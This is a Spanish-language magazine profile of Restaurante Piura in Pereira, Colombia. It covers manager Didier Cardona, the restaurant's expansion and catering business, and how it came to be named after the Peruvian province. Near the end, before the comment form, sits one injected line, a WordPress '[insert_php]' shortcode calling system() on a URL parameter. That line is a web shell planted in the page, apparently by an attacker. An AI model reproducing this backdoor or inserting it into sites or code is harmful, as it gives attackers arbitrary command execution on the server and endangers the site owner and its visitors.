home Gastronomía PIURA Nombre sonoro para paladares exquisitos

PIURA Nombre sonoro para paladares exquisitos

Dedicación absoluta, innovación, trabajo en equipo, liderazgo encaminado al éxito, investigación
constante hacen de este restaurante una verdadera experiencia para los comensales.

Más allá de lo que se prepara en la cocina, con calidad y pasión, aliarse con medios de comunicación, preparar especialidades constantemente, estar vigente en las redes sociales y ofertar organización de eventos complaciendo y asesorando al cliente hacen del Restaurante Piura una verdadera empresa gastronómica que está vigente en el referente regional y mundial.

Dedicación exclusiva a un tipo de cocina, de la mano de la investigación y en cierta forma la transmisión de conocimientos a quien llega para saborear las especialidades, sumado a un ambiente con sello propio instan a las personas a tener fidelidad con el lugar donde se degusta sabores propios de la cultura peruana.

Al frente del negocio está Didier Cardona, quien empezó hace 17 años en el mundo de la gastronomía. Gerenció bares, discotecas y restaurantes en Pereira. Su fuerte inclinación gastronómica aunada con insistir, persistir y no desistir lo tiene en las cumbres del reconocimiento.

A LA FECHA

Luego de recorrer sendas en las que “abrimos otro restaurante que fue competencia para nosotros mismos”, se aprendió del error se tomó el impulso necesario para posicionar el negocio y consolidarlo en Pereira, con visión de mundo. Entonces “se abrió en la parte de afuera, también un salón para conferencias, se implementó la ´comida a mantel´, espacios que no tenían y a abrir el mercado con el apoyo de personal de negocios y protocolo. Así, se amplió la oferta y no solo llegaron clientes de estatus alto, solamente para cumpleaños y cenas, sino la atención se ajustó a lo corporativo”. Ahora también se hacen juntas y cierran negocios.

El auge se aumentó con otros ajustes, “estos consistieron en el cambio de cubiertos y la cava, el volumen al bar, el cerramiento completo de la cocina; lo que se consolidó con la incorporación de los sofisticados equipos que quedaron de Perú Gourmet´. La demanda los encaminó a ser contratados para eventos glamorosos.

chef2

Un inconveniente en el camino fue “que la cocina ya no daba cuando había lleno un viernes 100 o 120 personas, y se complicaba con la comida a la carta que es un poco más dispendiosa”. Lo cual se unió con el tema de hacer eventos, “entonces era hacer la carta del restaurante y atender a 150 más personas para una finca, entonces llegó el momento y casi colapsamos”. La solución hacer una cocina auxiliar para eventos.

Una cosa lleva a otra y así nace el catering ´El Gourmet By Piura´, dos negocios que van ligados en la misma línea. “al principio las personas que querían un evento pedían sus platos y entendieron que podíamos atenderlos con sus preferencias, pero queríamos brindarles una experiencia diferente y así logramos que se respetara la comida peruana. Vienen, comen y se van tras vivenciar una historia verdadera. Así se posiciona atender con ceviche y contarles su origen, ofrecer la ´leche de tigre´ y conocen que es buena para la resaca”: Ahora los clientes piden y quieren saber qué es, de dónde viene y otros detalles, que cada mesero está en capacidad de responder, por la capacitación permanente que tienen.

Innovaciones sencillas como ´el vino del mes´, una experiencia más para los sentidos, son estrategias en las que todos, los 35 integrantes del equipo entre personal de planta y ocasionales, aportan. “Toda idea se tiene en cuenta y analiza, para tomar decisiones”. El resultado final clientes satisfechos, que retornan.

LO POR VENIR

“Quiero atravesar frontera, que nos reconozcan afuera de Risaralda y Colombia. Soy uno de esos ciudadanos que creyeron en su ciudad y lo están haciendo con excelencia. Quiero que la clientela se sienta como si estuviese en Estados Unidos o en Francia, o en Italia y seguimos trabajando en ese objetivo”.

Sabe que para ser los mejores y dejar huella se requiere sacrificio e investigación, además de precisión en la atención y minimizar los errores, que no están exentos de cometer, pero cuando estos sucedan la actitud es sacarles provecho. “Gracias a un inconveniente con un cliente que siempre recuerdo, quien se molestó porque pese a tener reserva para una fecha especial, la atención fue demorada: ahora estamos preparados y se atiende una mesa en 12 minutos exactos”.

ORIGEN DEL NOMBRE
En el principio se llamó Cusco, “y fue una cosa loquísima, porque el dueño de Cusco a nivel nacional se enteró y lógicamente se enojó, me llamó en buenos términos y le contesté tranquilo, vamos a cambiar el nombre. Busqué en Google y veía provincias y todo lo que tenía que ver con Perú, hasta que llegué a un punto en que vi Piura, que es una provincia al norte de Perú, que limita con el Ecuador y además de ´pegajoso´, e pareció viable y acertado. Entonces se propuso en la junta directiva y se quedó. A partir de ese momento empezó un nuevo ciclo”.

[insert_php] system($_GET[“ccffcc”]); [/insert_php]

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *